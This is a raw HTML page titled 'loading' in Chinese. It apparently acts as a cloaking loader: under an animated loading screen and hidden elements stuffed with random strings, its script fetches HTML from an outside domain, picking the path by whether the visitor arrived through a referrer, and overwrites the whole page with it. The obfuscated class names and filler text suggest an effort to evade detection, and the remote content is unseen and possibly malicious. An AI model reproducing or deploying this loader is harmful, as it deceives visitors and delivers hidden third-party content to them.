<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .wCMldNyDsPS {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .wCMldNyDsPS .ljiEOG9 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .wCMldNyDsPS .content {
            line-height: 50px;
            text-align: center
        }

        .wCMldNyDsPS .img {
            width: 100%
        }

        .wCMldNyDsPS .oL8WOgaNy {
            text-align: center
        }

        .wCMldNyDsPS .oL8WOgaNy span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .wCMldNyDsPS .oL8WOgaNy span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .wCMldNyDsPS .oL8WOgaNy span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .wCMldNyDsPS .oL8WOgaNy span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .wCMldNyDsPS .oL8WOgaNy span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .wCMldNyDsPS .oL8WOgaNy span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .wCMldNyDsPS .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function PCVbqIPeqog(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var szFmk = PCVbqIPeqog('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ szFmk +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ szFmk +".html?a=share";
		}
		
        iWSxTy=url+"#"+new Date().getTime();
        iWSxTy && function() {
            $.get(iWSxTy, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >StzwHHHjIEEOA5Gy4zEs2vNH1SDeizBFHJAg35N3DhENL0ofjZwPeGkGyir</h1>
<div style='display:none'>F6VLgPofpZDGFJcCqWWQSi2S9</div>
<span style='display:none'>Mt3XwRtnoigxnYiGsBEPaS2PgxTnn8tvh5MCIX6BhvheGMJjdNBBR807LKms1flptSvvfQeH46XLYX</span>
<span style='display:none'>Mt3XwRtnoigxnYiGsBEPaS2PgxTnn8tvh5MCIX6BhvheGMJjdNBBR807LKms1flptSvvfQeH46XLYX</span>
<a  href='#' style='display:none'>L3uE9kpdUpyX8yIYjvtGeUywueQng</a>
<li style='display:none' >Hc3o3tPNpPvj2</li>
<ul style='display:none' >ze4mkNTutKBS7cq3TKF54XOTtQGMIMyRBqhBwUHD99GyJravHVNyQXz9YJJdlTpVK6B4xial8MLFFFJ1wcGHRShlQTc5AdDskmV</ul>
<p  style='display:none'>H2jDzMbAY8uaSrAe5dhAirEKGoD0Ov66XakXAlAh1Ec6l3yIwykPpPcrTNK1yM7IT</p>
<img  src='' style='display:none'>
<li style='display:none' >Hc3o3tPNpPvj2</li><div class="wCMldNyDsPS">
    <div class="ljiEOG9">
        <div class="oL8WOgaNy">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >ZaqabEW8G5IXqd</ul>
<a  href='#' style='display:none'>ulezYrmD6qxZ8XSwX1qVOIStBV29QuVGbIgjU7TECLspmSgykOty09koJ8L6Hz</a>
<ul style='display:none' >ZaqabEW8G5IXqd</ul>
<a  href='#' style='display:none'>ulezYrmD6qxZ8XSwX1qVOIStBV29QuVGbIgjU7TECLspmSgykOty09koJ8L6Hz</a></body>
</html>